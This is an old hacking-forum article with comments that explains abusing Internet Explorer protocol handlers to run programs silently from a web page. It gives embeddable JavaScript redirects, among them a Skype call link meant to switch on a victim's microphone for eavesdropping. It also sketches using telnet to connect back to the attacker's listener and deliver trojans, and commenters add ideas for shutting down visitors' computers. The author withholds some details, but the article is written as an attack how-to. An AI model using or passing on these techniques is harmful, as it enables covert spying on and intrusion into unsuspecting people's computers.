Follow us on Twitter!
The measure of a mans life is not how well he dies, but how well he lives.
Sunday, April 20, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 32
Guests Online: 30
Members Online: 2

Registered Members: 82844
Newest Member: Jimmy Zhang
Latest Articles

IE Xploit

Arrow Image What the IE exploit is, how to use it, how to hide it and what you can do. Examples. Script kiddies beware, this article is engineered only to give enough to be just that script kiddies, the hardcore stuff you've got to learn yourself.



-=IE Exploit=-

Ok, this exploit isn\'t exactly the newest in the book, but it\'s still valid and hasn\'t been

patched(thanks Microsoft.) So basically this exploit allows us to remotely run programs on

computers via a web page. So let\'s dig in.

We\'ll start with a bit of stuff you should know:

Open up IE and in the URL bar type \"C:\\\"
Wow, IE just turned into a windows explorer(sorta.)
Isn\'t that intresting? Well, what if we could run other programs that way...what could we do?
Think about anysite you\'ve been to that allows you to open an aim window to someone. Ever

looked at the hyperlink text?
It looks something like this:
aim:goIm?screenname=tikprog&message=hello+world
okay, lets break that up a bit.
we\'ve got 3 parts to this
aim:
goIm?
screenname=tikprog&message=hello+world

ok, the aim part tells the browser what program to use, various programs have this,
aim:
yahoo:
irc:
ect....

next we have goIM? look like php to anyone but me? yeah....similar. it\'s the command. aim

has alot of these:
goIm?
goAway?
and lots of others (google \"aim:goIM?\" and it should give you a nice list)

and finally, those of you who know php will know this already, the last bit are the

parameters...that will send it to me with \"hello world\" in it. I\'m not going to explain aim

scripting(if you can even call it that, google is your friend, or if you beg maybe I\'ll write a

\"scripting for various things\" article).

Okay, to the important part here the \"aim:\" part. Now, if Aim has this, and as I\'ve said so

does yahoo and IRC, what else may have it? Well, I know for a fact alot of things do...I\'ll

give some examples later, but first I want you to learn a bit...because that is what being a

hacker is about.

The reason this is good for IE and not other browsers(yay for FireFox!) is that IE doesn\'t

prompt you for confirmation that you want to run this script, FireFox prompts you with a nice

little box. Now, this become a dangerous exploit when you realize that some other

programs that are more dangerous than AIM or IRC have this property. Let\'s

say....oh....command, telnet, regedit. Now, for command and regedit I\'m only going to show

howto access them, using them is much more difficult and I\'m not giving that up so a bunch

of script kiddies can flood the next with destructive webpages. Those of you how actually

figure it out I\'m hoping are not going to kill the world. These pages can do ALOT of damage

and I in no way advocate them for destructive, but there is a way(that I will show) to use

them to gain some nice access and play some fun tricks.

With that being said....let\'s move on to the next topic. So now you have half a clue what\'s

up with this exploit. If you\'ve been paying attention you may be thinking to yourself \"<insert

prefered name here> don\'t they have to click a hyperlink? Who\'s dumb enough to do that?\"

Thankfully, the Samurai has put 2 and 2 together(and gotten 5....read 1984, seriously) and

made a nice little script to do that too. So, I\'m not explaining how JScripts work, just going

to show you the code and give a brief explaination...if you don\'t know JScripts....GO LEARN

DAMNIT. so here\'s my code

<script>
window.location=\"aim:goIm?screenname=tikprog&message=hello+world\";
</script>

So, what does this do? I redirects the page to that URL, which isn\'t a URL, just a nice little

command. Embed this in a webpage and noone will notice...no change is made...it just runs

nicely.

So....now your thinking \"...but Samurai, who care about putting an AIM message script in.\"

and again ye of little faith, I am some fun with this. I\'ll give you a few nice ones.

For snooping:
There is a nice little messaging program out there, skype (www.skype.com I would

recommend it. It\'s encrypted, allows VoIP, has rocking emoticons type \"(finger)\" for a

hidden one, and just kicks AIMs butt), most important is VoIP. So, let\'s say you get your

friend ( or whoever you want to snoop on.) Next go nab the source from a trusted site. I like

google. And build a webpage on it (make sure you change the picture source so they show

up) and place it in something like geocities with embedded code and use aim to hide the

link by putting fake text (html works nicely too) with the URL.

Skype\'s command works like this:
skype:
and you put the parmater where the command went and the command where the parameter

was.... username?call.
so embed this code:

<script>
window.location=\"skype:username?call\";
</script>

And then answer the call. If they have a mic it will turn on and you can listen in.

Now, as promised the reason for this...intrusion!

Build a similar page and we\'re using our friend telnet. Your going to need my simple trojan

article, or build a socket reciever in VB or whatever you want. Now this only works if you

can get a REAL IP address for yourself. If your behind a router(or they are) it may not work.

So we all know our friend telnet. So your code needs to open telnet to your IP address on

the port you want. Telnet has a slightly different protocal to use here (think like command

line) and use that in the JScript code. I\'m not giving you the whole thing...I want YOU to

learn and to make sure not everyone does this.

So just think...using command, regedit, *nix you could open ports, run other apps,

download trojans. And with a bit of creativity possibly gain some new access.

Enjoy.

Comments

hackerboy666on October 03 2006 - 17:08:30
thats 1 of the best articles ive read in quite some time. interesting and helpful. good job!
only_samuraion October 03 2006 - 17:11:22
thanks mate. rate it high if you like it. pm me if ya'll have any questions or anything. im glad to help
BluMooseon October 03 2006 - 19:01:36
Very nice article Smile Making a .swf to execute the code could lead to lot of entertainment aswell (imagine people's pcs shutting down everytime they opened your myspace page...)
chislamon October 03 2006 - 22:28:40
nice article man
Arto_8000on October 04 2006 - 02:26:07
Actually i dunno why you call this type of exploit IE only, some protocol such as "irc" don't ask you before it's execute, but for xml: it ask you first. Only depend of what protocole your using.
only_samuraion October 04 2006 - 04:01:47
the IE only part means that FF and such dont have it. they still allow these things but they prompt a question first so you cant use it as hidden
SwiftNomadon October 06 2006 - 20:03:45
I liked this one. Im going to dig more into this. Good job!
korgon October 07 2006 - 02:36:32
Great article for new people but this has been well known for a while and skype well for us elders LOL. Still good though 6/10
only_samuraion October 24 2006 - 17:28:23
kiyoura what more do you want? want me to spell out how to take out files, edit the registry, send emails via this so all you skiddies can just jump on and "hack the planet?" This is saying what can be done and giving some examples. I'm not going to write code out that will just tell you what to do. GO LEARN SOMETHING.
TWS_Sentinelon January 11 2007 - 06:48:17
a very nice article but one question ... say your able to execute the "telnet://" open a connection to your tcpListener or some kind of socket listener. Use a streamWriter to upload data/trojan/whatever ... you still can then execute the package remotely. or can you? Maybe I'm missing something?
TWS_Sentinelon January 11 2007 - 06:49:15
sorry, the above should be corrected: you still can't then execute
only_samuraion February 19 2007 - 21:54:02
i dont think you can remotely execute it, unless you can use the IE exploit to do that. so have your connection software be automated and have the page that does the telnet redirect automatically after like 10 seconds to the page that calls "program://" or w/e,,, that might work
revolt0163on March 08 2007 - 01:27:23
say you put aim://bladhvadhfKS in a frames tag, and they didn't have aim, would it give an error msg?
Der Heiligenon March 11 2007 - 16:42:28
Very good article samurai, I'm definetly digging deeper into this too Grin. And I'm glad you didn't just spoon feed skiddies how to do it. Very good job Pfft.
R3l3ntl3sson April 22 2007 - 21:53:49
Great thank you! Pfft Really good! And great it stops skiddies! Smile
Damnationon June 18 2007 - 06:39:39
Wow, thanks samurai! Grin I have so many new, fun ideas! I'm guessing script kiddies rated this poor. Shock
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.